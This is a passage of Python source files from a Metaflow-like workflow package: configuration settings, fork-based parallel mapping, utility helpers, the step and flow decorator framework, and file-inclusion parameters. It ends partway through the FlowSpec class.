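#   # Returns 's3' if METAFLOW_DEFAULT_DATASTORE=s3 is exported in the shell,
#   # otherwise whatever config.json says, otherwise the fallback 'local'.
#   from_conf('METAFLOW_DEFAULT_DATASTORE', 'local')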
###
# Default configuration
###
DEFAULT_DATASTORE = from_conf('METAFLOW_DEFAULT_DATASTORE', 'local')
DEFAULT_METADATA = from_conf('METAFLOW_DEFAULT_METADATA', 'local')
###
# Datastore configuration
###
# Path to the local directory to store artifacts for 'local' datastore.
DATASTORE_LOCAL_DIR = '.metaflow'
DATASTORE_SYSROOT_LOCAL = from_conf('METAFLOW_DATASTORE_SYSROOT_LOCAL')
# S3 bucket and prefix to store artifacts for 's3' datastore.
DATASTORE_SYSROOT_S3 = from_conf('METAFLOW_DATASTORE_SYSROOT_S3')
# S3 datatools root location
DATATOOLS_S3ROOT = from_conf(
'METAFLOW_DATATOOLS_S3ROOT',
'%s/data' % from_conf('METAFLOW_DATASTORE_SYSROOT_S3'))
###
# Datastore local cache
###
# Path to the client cache
CLIENT_CACHE_PATH = from_conf('METAFLOW_CLIENT_CACHE_PATH', '/tmp/metaflow_client')
# Maximum size (in bytes) of the cache
CLIENT_CACHE_MAX_SIZE = from_conf('METAFLOW_CLIENT_CACHE_MAX_SIZE', 10000)
###
# Metadata configuration
###
METADATA_SERVICE_URL = from_conf('METAFLOW_SERVICE_URL')
METADATA_SERVICE_NUM_RETRIES = from_conf('METAFLOW_SERVICE_RETRY_COUNT', 5)
METADATA_SERVICE_HEADERS = json.loads(from_conf('METAFLOW_SERVICE_HEADERS', '{}'))
###
# AWS Batch configuration
###
# IAM role for AWS Batch container with S3 access
ECS_S3_ACCESS_IAM_ROLE = from_conf('METAFLOW_ECS_S3_ACCESS_IAM_ROLE')
# Job queue for AWS Batch
BATCH_JOB_QUEUE = from_conf('METAFLOW_BATCH_JOB_QUEUE')
# Default container image for AWS Batch
BATCH_CONTAINER_IMAGE = from_conf("METAFLOW_BATCH_CONTAINER_IMAGE")
# Default container registry for AWS Batch
BATCH_CONTAINER_REGISTRY = from_conf("METAFLOW_BATCH_CONTAINER_REGISTRY")
# Metadata service URL for AWS Batch
BATCH_METADATA_SERVICE_URL = METADATA_SERVICE_URL
###
# Conda configuration
###
# Conda package root location on S3
CONDA_PACKAGE_S3ROOT = from_conf(
'METAFLOW_CONDA_PACKAGE_S3ROOT',
'%s/conda' % from_conf('METAFLOW_DATASTORE_SYSROOT_S3'))
###
# Debug configuration
###
DEBUG_OPTIONS = ['subcommand', 'sidecar', 's3client']
for typ in DEBUG_OPTIONS:
vars()['METAFLOW_DEBUG_%s' % typ.upper()] = from_conf('METAFLOW_DEBUG_%s' % typ.upper())
###
# AWS Sandbox configuration
###
# Boolean flag for metaflow AWS sandbox access
AWS_SANDBOX_ENABLED = bool(from_conf('METAFLOW_AWS_SANDBOX_ENABLED', False))
# Metaflow AWS sandbox auth endpoint
AWS_SANDBOX_STS_ENDPOINT_URL = from_conf('METAFLOW_SERVICE_URL')
# Metaflow AWS sandbox API auth key
AWS_SANDBOX_API_KEY = from_conf('METAFLOW_AWS_SANDBOX_API_KEY')
# Internal Metadata URL
AWS_SANDBOX_INTERNAL_SERVICE_URL = from_conf('METAFLOW_AWS_SANDBOX_INTERNAL_SERVICE_URL')
# AWS region
AWS_SANDBOX_REGION = from_conf('METAFLOW_AWS_SANDBOX_REGION')
# Finalize configuration
if AWS_SANDBOX_ENABLED:
os.environ['AWS_DEFAULT_REGION'] = AWS_SANDBOX_REGION
BATCH_METADATA_SERVICE_URL = AWS_SANDBOX_INTERNAL_SERVICE_URL
METADATA_SERVICE_HEADERS['x-api-key'] = AWS_SANDBOX_API_KEY
# MAX_ATTEMPTS is the maximum number of attempts, including the first
# task, retries, and the final fallback task and its retries.
#
# Datastore needs to check all attempt files to find the latest one, so
# increasing this limit has real performance implications for all tasks.
# Decreasing this limit is very unsafe, as it can lead to wrong results
# being read from old tasks.
MAX_ATTEMPTS = 6
# the naughty, naughty driver.py imported by lib2to3 produces
# spam messages to the root logger. This is what is required
# to silence it:
class Filter(logging.Filter):
def filter(self, record):
if record.pathname.endswith('driver.py') and \
'grammar' in record.msg:
return False
return True
logger = logging.getLogger()
logger.addFilter(Filter())
def get_version(pkg):
return pkg_resources.get_distribution(pkg).version
# PINNED_CONDA_LIBS are the libraries that metaflow depends on for execution
# and are needed within a conda environment
def get_pinned_conda_libs():
return {
'click': '7.0',
'requests': '2.22.0',
'boto3': '1.9.235',
'coverage': '4.5.3'
}
cached_aws_sandbox_creds = None
def get_authenticated_boto3_client(module):
from metaflow.exception import MetaflowException
import requests
try:
import boto3
except (NameError, ImportError):
raise MetaflowException(
"Could not import module 'boto3'. Install boto3 first.")
if AWS_SANDBOX_ENABLED:
global cached_aws_sandbox_creds
if cached_aws_sandbox_creds is None:
# authenticate using STS
url = "%s/auth/token" % AWS_SANDBOX_STS_ENDPOINT_URL
headers = {
'x-api-key': AWS_SANDBOX_API_KEY
}
try:
r = requests.get(url, headers=headers)
r.raise_for_status()
cached_aws_sandbox_creds = r.json()
except requests.exceptions.HTTPError as e:
raise MetaflowException(repr(e))
return boto3.session.Session(**cached_aws_sandbox_creds).client(module)
return boto3.client(module) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/metaflow_config.py | metaflow_config.py |
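# Illustrative sketch (not part of the original module): outside the AWS
# sandbox this is a thin wrapper around boto3, e.g.
#
#   s3 = get_authenticated_boto3_client('s3')
#
# Inside the sandbox the same call first exchanges the configured API key for
# temporary STS credentials and caches them for subsequent clients.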
import sys
import os
import traceback
from itertools import islice
from multiprocessing import cpu_count
from tempfile import NamedTemporaryFile
try:
# Python 2
import cPickle as pickle
except:
# Python 3
import pickle
# This module reimplements select functions from the standard
# Python multiprocessing module.
#
# Three reasons why:
#
# 1) Multiprocessing has open bugs, e.g. https://bugs.python.org/issue29759
# 2) Work around limits, like the 32MB object limit in Queue, without
# introducing an external dependency like joblib.
# 3) Supports closures and lambdas in contrast to multiprocessing.
class MulticoreException(Exception):
pass
def _spawn(func, arg, dir):
with NamedTemporaryFile(prefix='parallel_map_',
dir=dir,
delete=False) as tmpfile:
output_file = tmpfile.name
# make sure stdout and stderr are flushed before forking. Otherwise
# we may print multiple copies of the same output
sys.stderr.flush()
sys.stdout.flush()
pid = os.fork()
if pid:
return pid, output_file
else:
try:
exit_code = 1
ret = func(arg)
with open(output_file, 'wb') as f:
pickle.dump(ret, f, protocol=pickle.HIGHEST_PROTOCOL)
exit_code = 0
except:
# we must not let any exceptions escape this function
# which might trigger unintended side-effects
traceback.print_exc()
finally:
sys.stderr.flush()
sys.stdout.flush()
# we can't use sys.exit(0) here since it raises SystemExit
# that may have unintended side-effects (e.g. triggering
# finally blocks).
os._exit(exit_code)
def parallel_imap_unordered(func, iterable, max_parallel=None, dir=None):
if max_parallel is None:
max_parallel = cpu_count()
ret = []
args_iter = iter(iterable)
pids = [_spawn(func, arg, dir)
for arg in islice(args_iter, max_parallel)]
while pids:
pid, output_file = pids.pop()
if os.waitpid(pid, 0)[1]:
raise MulticoreException('Child failed')
with open(output_file, 'rb') as f:
yield pickle.load(f)
os.remove(output_file)
arg = list(islice(args_iter, 1))
if arg:
pids.insert(0, _spawn(func, arg[0], dir))
def parallel_map(func, iterable, **kwargs):
def wrapper(arg_with_idx):
idx, arg = arg_with_idx
return idx, func(arg)
res = parallel_imap_unordered(wrapper, enumerate(iterable), **kwargs)
return [r for idx, r in sorted(res)] | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/multicore_utils.py | multicore_utils.py |
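# Illustrative sketch (not part of the original module): although the forked
# workers finish in arbitrary order, parallel_map returns results in input
# order because each result is tagged with its index before sorting.
#
#   squares = parallel_map(lambda x: x * x, range(8), max_parallel=4)
#   assert squares == [0, 1, 4, 9, 16, 25, 36, 49]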
import os
import shutil
import sys
import tempfile
import zlib
import base64
from functools import wraps
from itertools import takewhile
from metaflow.exception import MetaflowUnknownUser, MetaflowInternalError
try:
# python2
import cStringIO
BytesIO = cStringIO.StringIO
unicode_type = unicode
bytes_type = str
from urllib import quote, unquote
# unquote_bytes should be a function that takes a urlencoded byte
# string, encoded in UTF-8, url-decodes it and returns it as a
# unicode object. Confusingly, how to accomplish this differs
# between Python2 and Python3.
#
# Test with this input URL:
    # b'crazypath/%01%C3%BF'
# it should produce
# u'crazypath/\x01\xff'
def unquote_bytes(x):
return to_unicode(unquote(to_bytes(x)))
except:
# python3
import io
BytesIO = io.BytesIO
unicode_type = str
bytes_type = bytes
from urllib.parse import quote, unquote
def unquote_bytes(x):
return unquote(to_unicode(x))
class TempDir(object):
    # Provide a temporary directory context manager since Python 2.7 does not have one built in
def __enter__(self):
self.name = tempfile.mkdtemp()
return self.name
def __exit__(self, exc_type, exc_value, traceback):
shutil.rmtree(self.name)
def cached_property(getter):
@wraps(getter)
def exec_once(self):
saved_name = '__%s' % getter.__name__
if not hasattr(self, saved_name):
setattr(self, saved_name, getter(self))
return getattr(self, saved_name)
return property(exec_once)
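# Illustrative sketch (hypothetical class and helper): the decorated getter
# runs once per instance and the result is memoized under a private attribute.
#
#   class Artifact(object):
#       @cached_property
#       def checksum(self):
#           return compute_sha1(self.path)   # expensive call, evaluated once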
def all_equal(it):
"""
Return True if all elements of the given iterator are equal.
"""
it = iter(it)
try:
first = next(it)
except StopIteration:
return True
for x in it:
if x != first:
return False
return True
def url_quote(url):
"""
Encode a unicode URL to a safe byte string
"""
# quote() works reliably only with (byte)strings in Python2,
# hence we need to .encode('utf-8') first. To see by yourself,
# try quote(u'\xff') in python2. Python3 converts the output
# always to Unicode, hence we need the outer to_bytes() too.
#
# We mark colon as a safe character to keep simple ASCII urls
# nice looking, e.g. "http://google.com"
return to_bytes(quote(to_bytes(url), safe='/:'))
def url_unquote(url_bytes):
"""
Decode a byte string encoded with url_quote to a unicode URL
"""
return unquote_bytes(url_bytes)
def is_stringish(x):
"""
Returns true if the object is a unicode or a bytes object
"""
return isinstance(x, bytes_type) or isinstance(x, unicode_type)
def to_fileobj(x):
"""
    Convert any string-like object to a byte-returning fileobj
"""
return BytesIO(to_bytes(x))
def to_unicode(x):
"""
Convert any object to a unicode object
"""
if isinstance(x, bytes_type):
return x.decode('utf-8')
else:
return unicode_type(x)
def to_bytes(x):
"""
Convert any object to a byte string
"""
if isinstance(x, unicode_type):
return x.encode('utf-8')
elif isinstance(x, bytes_type):
return x
elif isinstance(x, float):
return repr(x).encode('utf-8')
else:
return str(x).encode('utf-8')
def get_username():
"""
Return the name of the current user, or None if the current user
could not be determined.
"""
# note: the order of the list matters
ENVVARS = ['METAFLOW_USER', 'SUDO_USER', 'USERNAME', 'USER']
for var in ENVVARS:
user = os.environ.get(var)
if user and user != 'root':
return user
return None
def resolve_identity():
prod_token = os.environ.get('METAFLOW_PRODUCTION_TOKEN')
if prod_token:
return 'production:%s' % prod_token
user = get_username()
if user and user != 'root':
return 'user:%s' % user
else:
raise MetaflowUnknownUser()
def get_latest_run_id(echo, flow_name):
from metaflow.datastore.local import LocalDataStore
local_root = LocalDataStore.datastore_root
if local_root is None:
v = LocalDataStore.get_datastore_root_from_config(echo, create_on_absent=False)
LocalDataStore.datastore_root = local_root = v
if local_root:
path = os.path.join(local_root, flow_name, 'latest_run')
if os.path.exists(path):
with open(path) as f:
return f.read()
return None
def write_latest_run_id(obj, run_id):
from metaflow.datastore.local import LocalDataStore
if LocalDataStore.datastore_root is None:
LocalDataStore.datastore_root = LocalDataStore.get_datastore_root_from_config(obj.echo)
path = os.path.join(LocalDataStore.datastore_root, obj.flow.name)
try:
os.makedirs(path)
except OSError as x:
if x.errno != 17:
            # errno 17 means the directory already exists, which is fine
raise
with open(os.path.join(path, 'latest_run'), 'w') as f:
f.write(str(run_id))
def get_object_package_version(obj):
"""
Return the top level package name and package version that defines the
class of the given object.
"""
try:
module_name = obj.__class__.__module__
if '.' in module_name:
top_package_name = module_name.split('.')[0]
else:
top_package_name = module_name
except AttributeError:
return None, None
try:
top_package_version = sys.modules[top_package_name].__version__
return top_package_name, top_package_version
except AttributeError:
return top_package_name, None
def compress_list(lst,
separator=',',
rangedelim=':',
zlibmarker='!',
zlibmin=500):
bad_items = [x for x in lst
if separator in x or rangedelim in x or zlibmarker in x]
if bad_items:
raise MetaflowInternalError("Item '%s' includes a delimiter character "
"so it can't be compressed" % bad_items[0])
# Three output modes:
lcp = longest_common_prefix(lst)
if len(lst) < 2 or not lcp:
# 1. Just a comma-separated list
res = separator.join(lst)
else:
# 2. Prefix and a comma-separated list of suffixes
lcplen = len(lcp)
residuals = [e[lcplen:] for e in lst]
res = rangedelim.join((lcp, separator.join(residuals)))
if len(res) < zlibmin:
return res
else:
# 3. zlib-compressed, base64-encoded, prefix-encoded list
# interestingly, a typical zlib-encoded list of suffixes
        # has plenty of redundancy. Compressing the data *twice* helps a
# lot
compressed = zlib.compress(zlib.compress(to_bytes(res)))
return zlibmarker + base64.b64encode(compressed).decode('utf-8')
def decompress_list(lststr, separator=',', rangedelim=':', zlibmarker='!'):
# Three input modes:
if lststr[0] == zlibmarker:
# 3. zlib-compressed, base64-encoded
lstbytes = base64.b64decode(lststr[1:])
decoded = zlib.decompress(zlib.decompress(lstbytes)).decode('utf-8')
else:
decoded = lststr
if rangedelim in decoded:
prefix, suffixes = decoded.split(rangedelim)
# 2. Prefix and a comma-separated list of suffixes
return [prefix + suffix for suffix in suffixes.split(separator)]
else:
# 1. Just a comma-separated list
return decoded.split(separator)
def longest_common_prefix(lst):
if lst:
return ''.join(a for a, _ in takewhile(lambda t: t[0] == t[1],
zip(min(lst), max(lst))))
else:
return ''
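# Illustrative sketch (hypothetical paths): compress_list and decompress_list
# round-trip a list of strings. Short lists sharing a prefix use the readable
# prefix form; long lists fall back to the zlib/base64 form marked with '!'.
#
#   paths = ['MyFlow/3/train/%d' % i for i in range(5)]
#   packed = compress_list(paths)            # 'MyFlow/3/train/:0,1,2,3,4'
#   assert decompress_list(packed) == paths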
def get_metaflow_root():
return os.path.dirname(os.path.dirname(__file__))
def dict_to_cli_options(params):
for k, v in params.items():
if v:
# we need special handling for 'with' since it is a reserved
# keyword in Python, so we call it 'decospecs' in click args
if k == 'decospecs':
k = 'with'
k = k.replace('_', '-')
if not isinstance(v, tuple):
v = [v]
for value in v:
yield '--%s' % k
if not isinstance(value, bool):
value = to_unicode(value)
if ' ' in value:
yield '\'%s\'' % value
else:
yield value
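# Illustrative sketch (hypothetical options dict): falsy values are dropped,
# underscores become dashes, and 'decospecs' is translated back to '--with'.
#
#   list(dict_to_cli_options({'max_workers': 4, 'decospecs': ('retry',)}))
#   # -> ['--max-workers', '4', '--with', 'retry']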
# This function is imported from https://github.com/cookiecutter/whichcraft
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
Note: This function was backported from the Python 3 source code.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
try: # Forced testing
from shutil import which as w
return w(cmd, mode, path)
except ImportError:
def _access_check(fn, mode):
return os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)
# If we're given a path with a directory part, look it up directly
# rather than referring to PATH directories. This includes checking
# relative to the current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/util.py | util.py |
import traceback
from functools import partial
from .flowspec import FlowSpec
from .exception import MetaflowException, InvalidDecoratorAttribute
class BadStepDecoratorException(MetaflowException):
headline = "Syntax error"
def __init__(self, deco, func):
msg =\
"You tried to apply decorator '{deco}' on '{func}' which is "\
"not declared as a @step. Make sure you apply this decorator "\
"on a function which has @step on the line just before the "\
"function name and @{deco} is above @step.".format(deco=deco,
func=func.__name__)
super(BadStepDecoratorException, self).__init__(msg)
class BadFlowDecoratorException(MetaflowException):
headline = "Syntax error"
def __init__(self, deconame):
msg =\
"Decorator '%s' can be applied only to FlowSpecs. Make sure "\
"the decorator is above a class definition." % deconame
super(BadFlowDecoratorException, self).__init__(msg)
class UnknownStepDecoratorException(MetaflowException):
headline = "Unknown step decorator"
def __init__(self, deconame):
from .plugins import STEP_DECORATORS
decos = ','.join(t.name for t in STEP_DECORATORS)
msg = "Unknown step decorator *{deconame}*. The following decorators are "\
"supported: *{decos}*".format(deconame=deconame, decos=decos)
super(UnknownStepDecoratorException, self).__init__(msg)
class DuplicateStepDecoratorException(MetaflowException):
headline = "Duplicate decorators"
def __init__(self, deco, func):
msg = "Step '{step}' already has a decorator '{deco}'. "\
"You can specify each decorator only once."\
.format(step=func.__name__, deco=deco)
super(DuplicateStepDecoratorException, self).__init__(msg)
class UnknownFlowDecoratorException(MetaflowException):
headline = "Unknown flow decorator"
def __init__(self, deconame):
from .plugins import FLOW_DECORATORS
decos = ','.join(t.name for t in FLOW_DECORATORS)
msg = "Unknown flow decorator *{deconame}*. The following decorators are "\
"supported: *{decos}*".format(deconame=deconame, decos=decos)
super(UnknownFlowDecoratorException, self).__init__(msg)
class DuplicateFlowDecoratorException(MetaflowException):
headline = "Duplicate decorators"
def __init__(self, deco):
msg = "Flow already has a decorator '{deco}'. "\
"You can specify each decorator only once."\
.format(deco=deco)
super(DuplicateFlowDecoratorException, self).__init__(msg)
class Decorator(object):
"""
Base class for all decorators.
"""
name = 'NONAME'
defaults = {}
def __init__(self,
attributes=None,
statically_defined=False):
self.attributes = self.defaults.copy()
self.statically_defined = statically_defined
if attributes:
for k, v in attributes.items():
if k in self.defaults:
self.attributes[k] = v
else:
raise InvalidDecoratorAttribute(
self.name, k, self.defaults)
@classmethod
def _parse_decorator_spec(cls, deco_spec):
top = deco_spec.split(':', 1)
if len(top) == 1:
return cls()
else:
name, attrspec = top
attrs = dict(a.split('=') for a in attrspec.split(','))
return cls(attributes=attrs)
def make_decorator_spec(self):
attrs = {k: v for k, v in self.attributes.items() if v is not None}
if attrs:
attrstr = ','.join('%s=%s' % x for x in attrs.items())
return '%s:%s' % (self.name, attrstr)
else:
return self.name
def __str__(self):
mode = 'decorated' if self.statically_defined else 'cli'
attrs = ' '.join('%s=%s' % x for x in self.attributes.items())
if attrs:
attrs = ' ' + attrs
fmt = '%s<%s%s>' % (self.name, mode, attrs)
return fmt
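# Illustrative note (assumes a concrete subclass, e.g. a RetryDecorator whose
# defaults include 'times'): _parse_decorator_spec turns a --with spec string
# into a decorator instance.
#
#   deco = RetryDecorator._parse_decorator_spec('retry:times=3')
#   deco.attributes['times']    # -> '3' (attribute values stay strings)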
class FlowDecorator(Decorator):
def flow_init(self, flow, graph, environment, datastore, logger):
"""
Called when all decorators have been created for this flow.
"""
pass
class StepDecorator(Decorator):
"""
Base class for all step decorators.
Example:
@my_decorator
@step
def a(self):
pass
@my_decorator
@step
def b(self):
pass
To make the above work, define a subclass
class MyDecorator(StepDecorator):
name = "my_decorator"
and include it in plugins.STEP_DECORATORS. Now both a() and b()
get an instance of MyDecorator, so you can keep step-specific
state easily.
TODO (savin): Initialize the decorators with flow, graph,
step.__name__ etc., so that we don't have to
pass them around with every lifecycle call.
"""
def step_init(self, flow, graph, step_name, decorators, environment, datastore, logger):
"""
Called when all decorators have been created for this step
"""
pass
def package_init(self, flow, step_name, environment):
"""
Called to determine package components
"""
pass
def step_task_retry_count(self):
"""
Called to determine the number of times this task should be retried.
Returns a tuple of (user_code_retries, error_retries). Error retries
are attempts to run the process after the user code has failed all
its retries.
"""
return 0, 0
def runtime_init(self, flow, graph, package, run_id):
"""
Top-level initialization before anything gets run in the runtime
context.
"""
pass
def runtime_task_created(self,
datastore,
task_id,
split_index,
input_paths,
is_cloned):
"""
Called when the runtime has created a task related to this step.
"""
pass
def runtime_finished(self, exception):
"""
Called when the runtime created task finishes or encounters an interrupt/exception.
"""
pass
def runtime_step_cli(self, cli_args, retry_count, max_user_code_retries):
"""
Access the command line for a step execution in the runtime context.
"""
pass
def task_pre_step(self,
step_name,
datastore,
metadata,
run_id,
task_id,
flow,
graph,
retry_count,
max_user_code_retries):
"""
Run before the step function in the task context.
"""
pass
def task_decorate(self,
step_func,
flow,
graph,
retry_count,
max_user_code_retries):
return step_func
def task_post_step(self,
step_name,
flow,
graph,
retry_count,
max_user_code_retries):
"""
Run after the step function has finished successfully in the task
context.
"""
pass
def task_exception(self,
exception,
step_name,
flow,
graph,
retry_count,
max_user_code_retries):
"""
Run if the step function raised an exception in the task context.
If this method returns True, it is assumed that the exception has
been taken care of and the flow may continue.
"""
pass
def task_finished(self,
step_name,
flow,
graph,
is_task_ok,
retry_count,
max_user_code_retries):
"""
Run after the task context has been finalized.
is_task_ok is set to False if the user code raised an exception that
was not handled by any decorator.
Note that you can't create or modify data artifacts in this method
since the task has been finalized by the time this method
is called. Also note that the task may fail after this method has been
called, so this method may get called multiple times for a task over
multiple attempts, similar to all task_ methods.
"""
pass
def _base_flow_decorator(decofunc, *args, **kwargs):
"""
Decorator prototype for all flow (class) decorators. This function gets
specialized and imported for all decorators types by
_import_plugin_decorators().
"""
if args:
# No keyword arguments specified for the decorator, e.g. @foobar.
# The first argument is the class to be decorated.
cls = args[0]
if isinstance(cls, type) and issubclass(cls, FlowSpec):
# flow decorators add attributes in the class dictionary,
# _flow_decorators.
if decofunc.name in cls._flow_decorators:
raise DuplicateFlowDecoratorException(decofunc.name)
else:
cls._flow_decorators[decofunc.name] = decofunc(attributes=kwargs,
statically_defined=True)
else:
raise BadFlowDecoratorException(decofunc.name)
return cls
else:
# Keyword arguments specified, e.g. @foobar(a=1, b=2).
# Return a decorator function that will get the actual
# function to be decorated as the first argument.
def wrap(f):
return _base_flow_decorator(decofunc, f, **kwargs)
return wrap
def _base_step_decorator(decotype, *args, **kwargs):
"""
Decorator prototype for all step decorators. This function gets specialized
and imported for all decorators types by _import_plugin_decorators().
"""
if args:
# No keyword arguments specified for the decorator, e.g. @foobar.
# The first argument is the function to be decorated.
func = args[0]
if not hasattr(func, 'is_step'):
raise BadStepDecoratorException(decotype.name, func)
        # Each decorator can be applied to a step only once
if decotype.name in [deco.name for deco in func.decorators]:
raise DuplicateStepDecoratorException(decotype.name, func)
else:
func.decorators.append(decotype(attributes=kwargs,
statically_defined=True))
return func
else:
# Keyword arguments specified, e.g. @foobar(a=1, b=2).
# Return a decorator function that will get the actual
# function to be decorated as the first argument.
def wrap(f):
return _base_step_decorator(decotype, f, **kwargs)
return wrap
def _attach_decorators(flow, decospecs):
"""
Attach decorators to all steps during runtime. This has the same
effect as if you defined the decorators statically in the source for
every step. Used by --with command line parameter.
"""
from .plugins import STEP_DECORATORS
decos = {decotype.name: decotype for decotype in STEP_DECORATORS}
for decospec in decospecs:
deconame = decospec.split(':')[0]
if deconame not in decos:
raise UnknownStepDecoratorException(deconame)
# Attach the decorator to all steps that don't have this decorator
# already. This means that statically defined decorators are always
# preferred over runtime decorators.
#
# Note that each step gets its own instance of the decorator class,
# so decorator can maintain step-specific state.
for step in flow:
if deconame not in [deco.name for deco in step.decorators]:
deco = decos[deconame]._parse_decorator_spec(decospec)
step.decorators.append(deco)
def _init_decorators(flow, graph, environment, datastore, logger):
for deco in flow._flow_decorators.values():
deco.flow_init(flow, graph, environment, datastore, logger)
for step in flow:
for deco in step.decorators:
deco.step_init(flow, graph, step.__name__,
step.decorators, environment, datastore, logger)
def step(f):
"""
The step decorator. Makes a method a step in the workflow.
"""
f.is_step = True
f.decorators = []
try:
# python 3
f.name = f.__name__
except:
# python 2
f.name = f.__func__.func_name
return f
def _import_plugin_decorators(globals_dict):
"""
Auto-generate a decorator function for every decorator
defined in plugins.STEP_DECORATORS and plugins.FLOW_DECORATORS.
"""
from .plugins import STEP_DECORATORS, FLOW_DECORATORS
# Q: Why not use StepDecorators directly as decorators?
# A: Getting an object behave as a decorator that can work
# both with and without arguments is surprisingly hard.
# It is easier to make plain function decorators work in
# the dual mode - see _base_step_decorator above.
for decotype in STEP_DECORATORS:
globals_dict[decotype.name] = partial(_base_step_decorator, decotype)
# add flow-level decorators
for decotype in FLOW_DECORATORS:
globals_dict[decotype.name] = partial(_base_flow_decorator, decotype) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/decorators.py | decorators.py |
import io
import os
import click
from metaflow.exception import MetaflowException
from metaflow.parameters import Parameter
class InternalFile():
def __init__(self, logger, is_text, encoding, path):
self._logger = logger
self._is_text = is_text
self._encoding = encoding
self._path = path
self._size = os.path.getsize(self._path)
def __call__(self):
unit = ['B', 'KB', 'MB', 'GB', 'TB']
sz = self._size
pos = 0
while pos < len(unit) and sz >= 1024:
sz = sz // 1024
pos += 1
if pos >= 3:
extra = '(this may take a while)'
else:
extra = ''
self._logger(
'Including file %s of size %d%s %s' % (self._path, sz, unit[pos], extra))
if self._is_text:
return io.open(self._path, mode='rt', encoding=self._encoding).read()
try:
return io.open(self._path, mode='rb').read()
except IOError:
# If we get an error here, since we know that the file exists already,
# it means that read failed which happens with Python 2.7 for large files
raise MetaflowException('Cannot read file at %s -- this is likely because it is too '
'large to be properly handled by Python 2.7' % self._path)
def name(self):
return self._path
def size(self):
return self._size
class FilePathClass(click.ParamType):
name = 'FilePath'
def __init__(self, is_text, encoding):
self._is_text = is_text
self._encoding = encoding
def convert(self, value, param, ctx):
try:
with open(value, mode='r') as _:
pass
except OSError:
self.fail("Could not open file '%s'" % value)
return InternalFile(ctx.obj.logger, self._is_text, self._encoding, value)
def __str__(self):
return repr(self)
def __repr__(self):
return 'FilePath'
class IncludeFile(Parameter):
def __init__(
self, name, required=False, is_text=True, encoding=None, help=None, default=None):
super(IncludeFile, self).__init__(
name, required=required, help=help, default=default,
type=FilePathClass(is_text, encoding)) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/includefile.py | includefile.py |
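# Illustrative sketch (hypothetical flow): IncludeFile is a Parameter whose
# command-line value is a path to a local file; FilePathClass wraps it in an
# InternalFile that reads the contents (text or bytes) when called.
#
#   from metaflow import FlowSpec
#
#   class CorpusFlow(FlowSpec):
#       corpus = IncludeFile('corpus', is_text=True, help='Training corpus')
#
# invoked e.g. as `python corpus_flow.py run --corpus ./corpus.txt`.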
from itertools import islice
import os
import sys
import inspect
import traceback
from . import cmd_with_io
from .parameters import Parameter
from .exception import MetaflowException, MetaflowInternalError, MergeArtifactsException
from .graph import FlowGraph
# For Python 3 compatibility
try:
basestring
except NameError:
basestring = str
class InvalidNextException(MetaflowException):
headline = "Invalid self.next() transition detected"
def __init__(self, msg):
        # NOTE this assumes that InvalidNextException is only raised
# at the top level of next()
_, line_no, _, _ = traceback.extract_stack()[-3]
super(InvalidNextException, self).__init__(msg, line_no)
class FlowSpec(object):
"""
Main class from which all Flows should inherit.
Attributes
----------
script_name
index
input
"""
# Attributes that are not saved in the datastore when checkpointing.
# Name starting with '__', methods, functions and Parameters do not need
# to be listed.
_EPHEMERAL = {'_EPHEMERAL',
'_datastore',
'_cached_input',
'_graph',
'_flow_decorators',
'_steps',
'index',
'input'}
_flow_decorators = {}
def __init__(self, use_cli=True):
"""
Construct a FlowSpec
Parameters
----------
use_cli : bool, optional, default: True
Set to True if the flow is invoked from __main__ or the command line
"""
self.name = self.__class__.__name__
self._datastore = None
self._transition = None
self._cached_input = {}
self._graph = FlowGraph(self.__class__)
self._steps = [getattr(self, node.name) for node in self._graph]
if use_cli:
# we import cli here to make sure custom parameters in
# args.py get fully evaluated before cli.py is imported.
from . import cli
cli.main(self)
@property
def script_name(self):
"""
Returns the name of the script containing the flow
Returns
-------
str
A string containing the name of the script
"""
fname = inspect.getfile(self.__class__)
if fname.endswith('.pyc'):
fname = fname[:-1]
return os.path.basename(fname)
def _get_parameters(self):
for var in dir(self):
if var[0] == '_':
continue
try:
val = getattr(self, var)
except:
continue
if isinstance(val, Parameter):
yield var, val
def _set_datastore(self, datastore):
self._datastore = datastore
def __iter__(self):
"""
Iterate over all steps in the Flow
Returns
-------
Iterator[graph.DAGNode]
Iterator over the steps in the flow
"""
return iter(self._steps)
def __getattr__(self, name):
if self._datastore and name in self._datastore:
# load the attribute from the datastore...
x = self._datastore[name]
# ...and cache it in the object for faster access
setattr(self, name, x)
return x
else:
raise AttributeError("Flow %s has no attribute '%s'" %
(self.name, name))
def cmd(self, cmdline, input={}, output=[]):
return cmd_with_io.cmd(cmdline,
input=input,
output=output)
@property
def index(self):
"""
Index of the task in a foreach step
In a foreach step, multiple instances of this step (tasks) will be executed,
one for each element in the foreach.
This property returns the zero based index of the current task. If this is not
a foreach step, this returns None.
See Also
--------
foreach_stack: A detailed example is given in the documentation of this function
Returns
-------
int
Index of the task in a foreach step
"""
if self._foreach_stack:
return self._foreach_stack[-1].index
@property
def input(self):
"""
Value passed to the task in a foreach step
In a foreach step, multiple instances of this step (tasks) will be executed,
one for each element in the foreach.
This property returns the element passed to the current task. If this is not
a foreach step, this returns None.
See Also
--------
foreach_stack: A detailed example is given in the documentation of this function
Returns
-------
object
Input passed to the task (can be any object)
"""
return self._find_input()
def foreach_stack(self):
"""
Returns the current stack of foreach steps for the current step
This effectively corresponds to the indexes and values at the various levels of nesting.
